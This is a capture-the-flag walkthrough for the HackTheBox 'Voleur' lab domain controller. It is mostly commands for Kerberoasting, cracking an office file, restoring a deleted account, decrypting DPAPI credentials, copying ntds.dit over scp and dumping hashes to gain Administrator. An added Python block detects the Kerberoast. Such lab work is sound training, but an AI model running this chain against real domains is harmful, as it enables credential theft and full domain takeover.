HackTheBox Voleur Walkthrough

insidepwn

This was a medium AD machine with the initial credentials ryan.naylor:HollowOct31Nyt. NTLM is disabled on the box, so we will use Kerberos throughout.

Initial Enumeration

The nmap scan shows nothing unusual, just SSH on port 2222.

BloodHound also did not reveal much for the initial user.

Foothold and user.txt

First we will explore the SMB shares using:

impacket-getTGT 'VOLEUR.HTB/ryan.naylor':'HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/ryan.naylor@dc.voleur.htb

The IT share has a folder called First-Line Support and a file called Access_Review.xlsx, but the file is password protected, so we will crack it with john:

office2john Access_Review.xlsx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

After cracking the password and opening the file, you will get some accounts and passwords.

With these in BloodHound we can see that svc_ldap has WriteSPN rights over svc_winrm, which allows a targeted Kerberoast:

impacket-getTGT 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
python targetedKerberoast.py -k --dc-host dc.voleur.htb -d VOLEUR.HTB

Crack the hash using John the Ripper:

john svcc_winrm.txt --wordlist=/usr/share/wordlists/rockyou.txt
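From the defender's side, the WriteSPN abuse above leaves a recognisable pair of Security events: a 5136 (directory object modified, attribute servicePrincipalName) on svc_winrm performed by svc_ldap, followed shortly by a 4769 RC4 service ticket request for svc_winrm from the same account. The following Python is an added example, not code from the original writeup or from any of the tools used; the event records and their field names are constructed to follow the 4769/5136 schemas, and the timestamps and correlation window are assumptions.

```python
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC / RC4-HMAC-EXP: crackable offline

# Constructed sample events (not captured from the box). 5136 = directory
# object modified: the SPN write on svc_winrm by svc_ldap is followed seconds
# later by an RC4 TGS request (4769) for svc_winrm from the same account.
SAMPLE_5136 = [
    {"TimeCreated": "2025-07-01T10:00:05", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName"},
]
SAMPLE_4769 = [
    {"TimeCreated": "2025-07-01T10:00:01", "TargetUserName": "ryan.naylor@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    {"TimeCreated": "2025-07-01T10:00:09", "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17"},
]

def _cn(dn):
    """First RDN value of a DN: 'CN=svc_winrm,...' -> 'svc_winrm'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def rc4_user_spn_requests(events_4769):
    """4769 events that are RC4 service tickets for user accounts
    (machine accounts ending in $ and krbtgt are skipped)."""
    out = []
    for ev in events_4769:
        svc = ev["ServiceName"].lower()
        if (ev["TicketEncryptionType"].lower() in RC4_ETYPES
                and not svc.endswith("$") and svc != "krbtgt"):
            out.append(ev)
    return out

def targeted_kerberoast_hits(events_5136, events_4769, window=timedelta(minutes=10)):
    """Pair an SPN write on account X by actor A (5136) with a later RC4 TGS
    for X requested by A (4769) inside the window."""
    hits = []
    for w in events_5136:
        if w["AttributeLDAPDisplayName"].lower() != "serviceprincipalname":
            continue
        actor, target = w["SubjectUserName"].lower(), _cn(w["ObjectDN"])
        t0 = datetime.fromisoformat(w["TimeCreated"])
        for r in rc4_user_spn_requests(events_4769):
            t1 = datetime.fromisoformat(r["TimeCreated"])
            if (r["TargetUserName"].split("@")[0].lower() == actor
                    and r["ServiceName"].lower() == target and t0 <= t1 <= t0 + window):
                hits.append((actor, target, w["TimeCreated"], r["TimeCreated"]))
    return hits
```

Auditing of directory object changes must be enabled on the DC for 5136 to be logged at all; the RC4 rule alone still catches the ticket request if it is not.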

Now we will request a TGT for the user svc_winrm and access its shell:

impacket-getTGT 'VOLEUR.HTB/svc_winrm':'<put_pass_here>'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

Privilege Escalation and root.txt

In Access_Review.xlsx we can see that the user todd.wolfe has been deleted (marked as deleted), so first we will restore that account using svc_ldap, because svc_ldap is a member of the Restore_Users group:

bloodyAD --host dc.voleur.htb -d voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k set restore 'todd.wolfe'

Use the latest bloodyAD version, otherwise you will get errors.

After restoring it, we will move to the SMB share of todd.wolfe and decrypt the password of the user jeremy.combs:

impacket-getTGT 'VOLEUR.HTB/todd.wolfe':'<pass_here_of_todd>'
export KRB5CCNAME=todd.wolfe.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/
get 772275FAD58525253490A9B0039791D3
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
get 08949382-134f-4c63-b93c-ce52efc0aa88

Then decrypt using:

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password '<pass_of_todd>' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

This gives the password of jeremy.combs.

Then we will access the SMB shares of jeremy.combs, where we find a note and an SSH id_rsa. The note said:

Here the admin is talking about svc_backup, so we will access its SSH:

ssh -i id_rsa svc_backup@voleur.htb -p 2222

After exploring the host over SSH and running linpeas, I found an ntds.dit, which we will use to dump the hashes of the Administrator and other users. First go to /mnt/c/IT/Third-Line Support/Backups/Active Directory and copy ntds.dit to /tmp, then go to /mnt/c/IT/Third-Line Support/Backups/registry and copy the SYSTEM file to /tmp. Then use scp to copy both to our machine:

scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/ntds.dit /path/to/save
scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/SYSTEM /path/to/save

Then we will use impacket-secretsdump to dump the hashes locally:

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

We will get the NTLM hash of the Administrator, so we request a TGT for that account and access the shell to get root.txt:

impacket-getTGT 'VOLEUR.HTB/Administrator' -hashes <LM:NT>
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

This is it for this machine.

Thanks for reading the walkthrough. Hope you like it! Do leave a comment for feedback or queries!
